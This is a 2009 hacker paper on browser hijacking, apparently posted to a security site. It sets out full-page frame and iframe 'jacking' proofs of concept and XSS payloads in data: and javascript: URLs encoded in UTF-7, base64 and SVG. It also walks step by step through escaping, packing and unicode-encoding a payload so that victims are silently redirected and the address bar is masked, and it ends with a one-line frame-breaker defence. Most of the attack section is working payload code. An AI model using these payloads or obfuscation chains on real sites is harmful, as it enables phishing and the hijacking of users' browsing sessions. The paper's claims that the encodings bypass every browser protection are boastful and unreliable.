Browser Hijacking Techniques 2009Written by p3loSunday, 3 May 2009
###### ##### ##### # # #### #### ##### #####
# # # # ## # # # # # # # #
# # # # # # # # # #### # # # #####
###### ##### # # # # # # ### ##### #
# # # # # # # # # # # # # # #
# # # # # ## # # # # # # # #
###### # # ##### ####### #### #### # # #####
# #
# # ##### ##### ##### # # # # #####
# # # # # # # # # # ## # #
#### # # ##### # ## # # ## # ####
# # # # # # # # # # # # # #
# # # ### # # ##### # # # # # #####
# ### # # ### ###
### # # # # # #
# ### ### #### #### # ### # # ### ###
# # # # # # # # # # # # # #
### #### ### # # # # # ### #### #### ###
#
#
#
#
# ### #
#### # # #### # # ###
# # # # # # ## # # #
#### #### # # # # # #
# #### ### #### ###
# #
# #
Author: p3Lo (Thibaut.L)
Date:05/2009
Target: All Moderns Browsers (the url address bar principally)
Tags:new XSS vector (remasterized) ,redirects,frame jacking, javascript malware obfuscation,
packing,url cache poisoning.
Site: http://attackvector.lescigales.org
Part 1
######
Everybody would have been able to think that these techniques were obsolete or too old, well no!
The object-oriented programming langage will be going to prove you that it's wrong.
Indeed, the usage of a programming langage like javascript can be awesome for an evil minded attacker.
Let us pass to explanation and the problematic:
- What can we do with frames / iframe, and with which constraint ?
- What can we do maliciously with javascript ?
- New obfuscation techniques wtf ?
- The iframe/frame way to pwn.
- One line to correct them all.
Lately I have worked on the development of new techniques, i'll announce it to you in the course of this paper.
What can we do legally with frames / iframe, and with which constraints ?
########################################################################
-------
Frame :
-------
The contents of the frames may be hosted on the same server as the parent page,
or it may link in code from another website server such that these external contents
are automatically displayed within the frame (transclusion or remote loading).
This may be confusing and inconvenient to the users: they can get the impression
that the information belongs to the same website; also, less than the full browser
window is available and the address bar is less informative. Some websites request
not to be used in this way on other websites; some discourage it by including a framekiller
script in its pages. The framing website runs a risk of being blamed for external
content that, for example, is or becomes inaccurate or objectionable. In addition,
there may be legal issues associated with framing, in that the owner of the external
content may object to the involuntary (and possibly objectionable) implied association
with the framing website. Visitors may confuse ownership of copyrights or trademarks
of the external site with the owner of the framing site.
-------
Iframe:
-------
An inline frame places another HTML document in a frame inside a normal (rather than frameset)
HTML document.First introduced by Microsoft Internet Explorer in 1997 and long only available
in that browser, the iframe tag is now widely supported by visual browsers. Unlike an object
element, an inline frame may be the "target" frame for links defined in other elements and it
may be "selected" by a browser as the focus for printing, viewing HTML source etc. The <iframe>
tag must be closed by </iframe>. Content between the <iframe> tags is used as alternative text
to be displayed if the browser does not support iframes. The iframe element is invalid in Strict
DTDs, and in XHTML version 1.1. Inline frames have, at times, been exploited to illicitly inject
code into a web page. Standardised in HTML 4.0 (Frameset and Transitional DTDs only); still current.
src: http://en.wikipedia.org/wiki/Framing_(World_Wide_Web)
--------------------------------------
The hundred per-cent malicious thing :
--------------------------------------
The malicious thing goes here, why not trying to put an iframe or a frame in a simple html page
with the full page dimensions ? Let's do it !
Simple Frame Jacking Proof of Concept:
--------------------------------------
<frameset rows="100%">
<!-- wtf ?? frame jacking ? -->
<frame noresize="noresize" frameborder="0" title="poc frame jacking" src="http://foo.proxy">
<!-- its time to bypass filters -->
</frame>
</frameset>
Simple Iframe Jacking Proof of Concept :
----------------------------------------
<body TOPMARGIN="0" LEFTMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<!--iframe isnt a fake site-->
<iframe src="http://foo.proxy" name="poc iframe jacking" width="100%" height="100%"
scrolling="auto" frameborder="no">
</iframe>
Now we know how to hide a website page with a frame or an iframe.
Consequently the problems to which we are confronted are:
- Can I reproduce an html iframe or a frame with another programming langage?
Yes with javascript or ajax for example,using a function to write html ( with eval, document.write...).
- How to obfuscate it?
I can obfuscate my frame/iframe attack using javascript, and differents encoding (base64,
escaped,unicode,ANSI,utf8...).
- Can i communicate between iframe ?
Of course with javascript rights on the framed/iframed page, respecting a little the Same origin Policies.
- What time is it ?
01:30 Its coffee time , don't hesitate to make a pause because the following lines are hardcoded.
Note : all last generation visual browsers support iframing or framing.
Briefly i had answered to all of these questions in this paragraph and i'll develop it
further the other parts of my paper.
What can we do maliciously with javascript ?
############################################
--------------------------------------
The Internet standards track protocol:
--------------------------------------
Javascript is awesome , the majority of malicious means to exploit haven't been disclosed yet,
in fact this paper will give birth to a new type of cross site scripting attack. The browser level XSS.
The browser's level xss use the Internet standards track protocol to execute javascript arbitrarly
directly on the web browser. So the way of exploitation differs according to the browsers.
But the javascript protocol is supported by all of them. If a browser level xss is executed directly
on the url ALL the xss filters can be bypassed using differents encoding content.
Place to the examples:
--------------
Data URL Scheme
---------------
data:[<mediatype>][;encoding],<data>
PoC Using the data protocol :
-----------------------------
Utf8 data url
data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e
Base64 data url
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTtoaXN0b3J5LmJhY2soKTs8L3NjcmlwdD4=
UTF7 data url
data:text/html;charset=utf-7,+ADw-script+AD4-alert(1)+ADs-history.back()+ADsAPA-/script+AD4-
UTF-16 in BASE64/UTF-7/UTF-8 mixture
data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg+-alert(1);history.back()+ADs-</script>
UTF-16 in BASE64
data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5A
C4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPg==+-
UTF-7 in BASE64
data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KDEpK0FEcy1oaXN0b3J5LmJhY2soKSt
BRHNBUEEtL3NjcmlwdCtBRDQt
obfuscated UTF-7 in BASE64
data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KDEpK0FEcy1oaXN0b3J5LmJhY2soKSt
BRHNBUEEtL3NjcmlwdCtBRDQt
Image svg+xml in base64
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaH
R0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZX
JzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9In
RleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
All this data scheme (are not my prefered) but could succeed to arbitrary code
(javascript / ajax /html /flash) execution.We can replace every previously
discovered attack vectors xss with src,href or other attribute to data scheme.
for example:
<a href="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e">test</a>
<iframe src="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e"></iframe>
<script>document.location=data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e</script>
etc...
So we can remasterise every attack vectors with encoding content.
But a little problem concerning the browser's compatibility persist.
That's why i prefer using the javascript protocol to do my attack.
As we have seen we can hide the url bar by a data encoded content.
And we can encode successively the xss vectors.
The javascript browser protocol is looking like this :
------------------------------------------------------
javascript:alert(1337)
Wtf ?? its working on every browsers.
New obfuscations techniques wtf ?
#################################
On the previous paragraph we have shown that we can obfuscate javascript or html with the help
of the browser encodings, now I show you how to convert html to javascript with the help of
javascript programming langage and encoding.
First just write html with javascript:
Frame jacking with simple html escape encoding:
-----------------------------------------------
<script type="text/javascript">document.write(unescape("%3Cframeset%20rows%3D%22100%25%22%3E%0A%3C%
21--%20wtf%20%3F%3F%20frame%20jacking%20%3F%20--%3E%0A%3Cframe%20noresize%3D%22noresize%22%20frameborder
%3D%220%22%20title%3D%22poc%20frame%20jacking%22%20src%3D%22http%3A%2F%2Ffoo.proxy%22%3E%0A%3C%21--%20its
%20time%20to%20bypass%20filters%20--%3E%0A%3C%2Fframe%3E%0A%3C%2Fframeset%3E"));</script>
Frame Jacking using write javascript function
---------------------------------------------
<script language="JavaScript" type="text/javascript">
<!--
function writeJS(){
var str='';
str+='<frameset rows="100%">';
str+='<!-- wtf ?? frame jacking ? -->';
str+='<frame noresize="noresize" frameborder="0" title="poc frame jacking" src="http:\/\/foo.proxy">';
str+='<!-- its time to bypass filters -->';
str+='<\/frame>';
str+='<\/frameset>';
document.write(str);
}
writeJS();
//-->
</script>
iFrame jacking with simple html escape encoding:
------------------------------------------------
<script type="text/javascript">document.write(unescape("%3Cbody%20TOPMARGIN%3D%220%22%20LEFTMARGIN%3D%220
%22%20MARGINWIDTH%3D%220%22%20MARGINHEIGHT%3D%220%22%3E%0A%3C%21--iframe%20isnt%20a%20fake%20site--%3E%0A
%3Ciframe%20src%3D%22http%3A%2F%2Ffoo.proxy%22%20%20name%3D%22poc%20iframe%20jacking%22%20%20width%3D%22100
%25%22%20height%3D%22100%25%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%3E%3C%2Fiframe%3E"));</script>
iFrame Jacking using write javascript function:
-----------------------------------------------
<script language="JavaScript" type="text/javascript">
<!--
function writeJS(){
var str='';
str+='<body TOPMARGIN="0" LEFTMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">';
str+='<!--iframe isnt a fake site-->';
str+='<iframe src="http:\/\/foo.proxy" name="poc iframe jacking" width="100%" height="100%" scrolling="auto"
frameborder="no"><\/iframe>';
document.write(str);
}
writeJS();
//-->
</script>
Ajax asynchronous inline frame jacking:
---------------------------------------
<script>
function initialize() {
var testFrame =
document.createElement("IFRAME");
testFrame.id = "testFrame";
testFrame.src = "http://foo.proxy";
testFrame.setAttribute("width","100%");
testFrame.setAttribute("height","100%");
testFrame.setAttribute("frameborder","no");
testFrame.setAttribute("scrolling","auto");
testFrame.style.display = "none";
document.body.appendChild(testFrame);
}
</script>
<body onload="initialize()" TOPMARGIN="0" LEFTMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
If we use the javascript or the data protocol , we could put all of these code in the url address bar.
And of course we haven't seen yet the javascript encoding usage (just the escape). At the moment where i
write this article it exist more than 20 encoding possibilities, and these encoding possibilities can be
combined to crypt/encode/pack your javascript content successively (infinitely) and all of it are bypassing
every browser securities.
The only existing constraint is the lenght of the code, more long is the code and more the time to execute
it is slow. Furthermore successive encoding using the javascript protocol can leads to new browsers bugs
like url cache poisoning. In order to don't overload my paper of source code I will use the frame jacking
PoC for my example( but the iframe PoC works too).
The iframe/frame way to pwn.
############################
-----------------------------------------------------------------
Step by step URL cache poisoning attacks (on remote or locally) :
-----------------------------------------------------------------
The url cache poisoning is a bug caused by all the recents browsers that i have discovered, indeed when
a certain encoding/packing level is reached, the content of the address bar disappear and is remplaced
by the last cached url . The attack can be performed in the url address bar , with a redirect or an xss.
Examples:
--------
for redirects
Victim.foo/redirect.php?r=javascript:urlcachepoisoning
for xss:
<script>document.location=document.write(urlcachepoisoning)</script>
Step1 use the frame jacking payload:
------------------------------------
<frameset rows="100%">
<!-- wtf ?? frame jacking ? -->
<frame noresize="noresize" frameborder="0" title="poc frame jacking" src="http://milw0rm.com/">
<!-- its time to bypass filters -->
</frame>
</frameset>
Step2 encode our frame jacking payload in html escape :
-------------------------------------------------------
document.write(unescape("%3Cframeset%20rows%3D%22100%25%22%3E%0A%3C%21--%20wtf%20%3F%3F%20frame%20jacking
%20%3F%20--%3E%0A%3Cframe%20noresize%3D%22noresize%22%20frameborder%3D%220%22%20title%3D%22poc%20frame%20
jacking%22%20src%3D%22http%3A%2F%2Fmilw0rm.com%2F%22%3E%0A%3C%21--%20its%20time%20to%20bypass%20filters%20
--%3E%0A%3C%2Fframe%3E%0A%3C%2Fframeset%3E%0A"));
Step3 we pack the escaped html with a javascript packer:
--------------------------------------------------------
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?
String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('j.i(k("%l%m%3%h%g%2%1%0%5%7--%c%4%6%6%9%a%4%6%4
--%1%0%d%e%3%f%2%n%3%o%2%x%3%w%9%a%2%A%3%u%q%8%p.r%8%2%1%0%5%7--%B%t%s%y%b%4--%1%0%5%z%1%0%5%v%1%0"));
',38,38,'0A|3E|22|3D|20|3C|3F|21|2F|20frame|20jacking|20filters|20wtf|3Cframe|20noresize|22noresize|25
|22100|write|document|unescape|3Cframeset|20rows|20frameborder|220|2Fmilw0rm|3A|com|20to|20time|22http
|2Fframeset|22poc|20title|20bypass|2Fframe|20src|20its'.split('|'),0,{}))</script>
Step4 encode the packed javascript in unicode and test it in the url with javascript protocol :
-----------------------------------------------------------------------------------------------
javascript:document.write('\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0065\u0076\u0061\u006c\u0028
\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0070\u002c\u0061\u002c\u0063\u002c\u006b\u002c\
u0065\u002c\u0064\u0029\u007b\u0065\u003d\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0063\
u0029\u007b\u0072\u0065\u0074\u0075\u0072\u006e\u0028\u0063\u003c\u0061\u003f\u0027\u0027\u003a\u0065\
u0028\u0070\u0061\u0072\u0073\u0065\u0049\u006e\u0074\u0028\u0063\u002f\u0061\u0029\u0029\u0029\u002b\
u0028\u0028\u0063\u003d\u0063\u0025\u0061\u0029\u003e\u0033\u0035\u003f\u0053\u0074\u0072\u0069\u006e\
u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0063\u002b\
u0032\u0039\u0029\u003a\u0063\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0033\u0036\
u0029\u0029\u007d\u003b\u0069\u0066\u0028\u0021\u0027\u0027\u002e\u0072\u0065\u0070\u006c\u0061\u0063\
u0065\u0028\u002f\u005e\u002f\u002c\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0029\u007b\u0077\u0068\
u0069\u006c\u0065\u0028\u0063\u002d\u002d\u0029\u007b\u0064\u005b\u0065\u0028\u0063\u0029\u005d\u003d\
u006b\u005b\u0063\u005d\u007c\u007c\u0065\u0028\u0063\u0029\u007d\u006b\u003d\u005b\u0066\u0075\u006e\
u0063\u0074\u0069\u006f\u006e\u0028\u0065\u0029\u007b\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0064\
u005b\u0065\u005d\u007d\u005d\u003b\u0065\u003d\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\
u0029\u007b\u0072\u0065\u0074\u0075\u0072\u006e\u0027\u005c\u005c\u0077\u002b\u0027\u007d\u003b\u0063\
u003d\u0031\u007d\u003b\u0077\u0068\u0069\u006c\u0065\u0028\u0063\u002d\u002d\u0029\u007b\u0069\u0066\
u0028\u006b\u005b\u0063\u005d\u0029\u007b\u0070\u003d\u0070\u002e\u0072\u0065\u0070\u006c\u0061\u0063\
u0065\u0028\u006e\u0065\u0077\u0020\u0052\u0065\u0067\u0045\u0078\u0070\u0028\u0027\u005c\u005c\u0062\
u0027\u002b\u0065\u0028\u0063\u0029\u002b\u0027\u005c\u005c\u0062\u0027\u002c\u0027\u0067\u0027\u0029\
u002c\u006b\u005b\u0063\u005d\u0029\u007d\u007d\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0070\u007d\
u0028\u0027\u006a\u002e\u0069\u0028\u006b\u0028\u0022\u0025\u006c\u0025\u006d\u0025\u0033\u0025\u0068\
u0025\u0067\u0025\u0032\u0025\u0031\u0025\u0030\u0025\u0035\u0025\u0037\u002d\u002d\u0025\u0063\u0025\
u0034\u0025\u0036\u0025\u0036\u0025\u0039\u0025\u0061\u0025\u0034\u0025\u0036\u0025\u0034\u002d\u002d\
u0025\u0031\u0025\u0030\u0025\u0064\u0025\u0065\u0025\u0033\u0025\u0066\u0025\u0032\u0025\u006e\u0025\
u0033\u0025\u006f\u0025\u0032\u0025\u0078\u0025\u0033\u0025\u0077\u0025\u0039\u0025\u0061\u0025\u0032\
u0025\u0041\u0025\u0033\u0025\u0075\u0025\u0071\u0025\u0038\u0025\u0070\u002e\u0072\u0025\u0038\u0025\
u0032\u0025\u0031\u0025\u0030\u0025\u0035\u0025\u0037\u002d\u002d\u0025\u0042\u0025\u0074\u0025\u0073\
u0025\u0079\u0025\u0062\u0025\u0034\u002d\u002d\u0025\u0031\u0025\u0030\u0025\u0035\u0025\u007a\u0025\
u0031\u0025\u0030\u0025\u0035\u0025\u0076\u0025\u0031\u0025\u0030\u0022\u0029\u0029\u003b\u0027\u002c\
u0033\u0038\u002c\u0033\u0038\u002c\u0027\u0030\u0041\u007c\u0033\u0045\u007c\u0032\u0032\u007c\u0033\
u0044\u007c\u0032\u0030\u007c\u0033\u0043\u007c\u0033\u0046\u007c\u0032\u0031\u007c\u0032\u0046\u007c\
u0032\u0030\u0066\u0072\u0061\u006d\u0065\u007c\u0032\u0030\u006a\u0061\u0063\u006b\u0069\u006e\u0067\
u007c\u0032\u0030\u0066\u0069\u006c\u0074\u0065\u0072\u0073\u007c\u0032\u0030\u0077\u0074\u0066\u007c\
u0033\u0043\u0066\u0072\u0061\u006d\u0065\u007c\u0032\u0030\u006e\u006f\u0072\u0065\u0073\u0069\u007a\
u0065\u007c\u0032\u0032\u006e\u006f\u0072\u0065\u0073\u0069\u007a\u0065\u007c\u0032\u0035\u007c\u0032\
u0032\u0031\u0030\u0030\u007c\u0077\u0072\u0069\u0074\u0065\u007c\u0064\u006f\u0063\u0075\u006d\u0065\
u006e\u0074\u007c\u0075\u006e\u0065\u0073\u0063\u0061\u0070\u0065\u007c\u0033\u0043\u0066\u0072\u0061\
u006d\u0065\u0073\u0065\u0074\u007c\u0032\u0030\u0072\u006f\u0077\u0073\u007c\u0032\u0030\u0066\u0072\
u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u007c\u0032\u0032\u0030\u007c\u0032\u0046\u006d\
u0069\u006c\u0077\u0030\u0072\u006d\u007c\u0033\u0041\u007c\u0063\u006f\u006d\u007c\u0032\u0030\u0074\
u006f\u007c\u0032\u0030\u0074\u0069\u006d\u0065\u007c\u0032\u0032\u0068\u0074\u0074\u0070\u007c\u0032\
u0046\u0066\u0072\u0061\u006d\u0065\u0073\u0065\u0074\u007c\u0032\u0032\u0070\u006f\u0063\u007c\u0032\
u0030\u0074\u0069\u0074\u006c\u0065\u007c\u0032\u0030\u0062\u0079\u0070\u0061\u0073\u0073\u007c\u0032\
u0046\u0066\u0072\u0061\u006d\u0065\u007c\u0032\u0030\u0073\u0072\u0063\u007c\u0032\u0030\u0069\u0074\
u0073\u0027\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u007c\u0027\u0029\u002c\u0030\u002c\u007b\
u007d\u0029\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')
The exploit is created, but others steps with multiples encoding and packing (formcharcode) can be added
(infinitely) to make harder for the victim to decrypt the attack. We understand that we can redirect every
xssed website, or redirected website silently on remote. After this little demonstration , we can imagine
that the attacker can replace the framed url by a phpproxy (who use cURL and javascript ) hosted on his server
in order to hijack the victim, i have already explained this techniques in one of my papers.
http://milw0rm.com/papers/289
One line to correct them all:
#############################
The frame breaker posted in my paper "from legal frame injection to illegal redirect" can be used to secure
the framed page, don't hesitate to put it on your login page to prevent possible future frame attacks on
your website.
if (top.frames.length!=0) top.location=self.document.location;
I hope that you enjoy to read my paper, i have done it for fun, and just for the PoC.
Links concerning this article:
------------------------------
video browser hijacking techniques part1 by me
http://p3lo.blip.tv/file/2006110/
http://www.ietf.org/rfc/rfc2397.txt
http://www.gnucitizen.org/blog/frame-injection-fun/
http://h4k.in/dataurl/
http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database
Sorry for my bad english , i speak only one langage, the ethical hacking.
greetz:
-------
Str0ke . Mike001 .zulrigh. Devil . Noxo . MySt3ri0us . xxello . t0fx . AzOTe . Funny . Stiv0n
scarface-team .MrRabah. Xylitol . Z3Q3ul . asylu3 . 0ni . KPCR . Sh0ck . Nasty Shade . SylTroX
TheCrow . HuG . Hug88 . Ez3kiEl . tr00ps . Iectricdr3ke . stivon . Faworis .tryks . sh4ka
emuleman . RF . White Angels . Miss Narkotik . p@@@ . Akxos/Freiya . Odysse . EniGmATiquE
. Tavux . v00d00chile . mrabah12 . Big.E .SoLiTaIr3 . 0vernet . HiTMaX . Orion
50-1337 CreW . CWH Underground . TBH . Team Sakage . FRHACK
Yehouda,dimtokill,blueninja,nico,snoop,benbourr,trika,sakage team,ooyep,freeman
Share this content:
|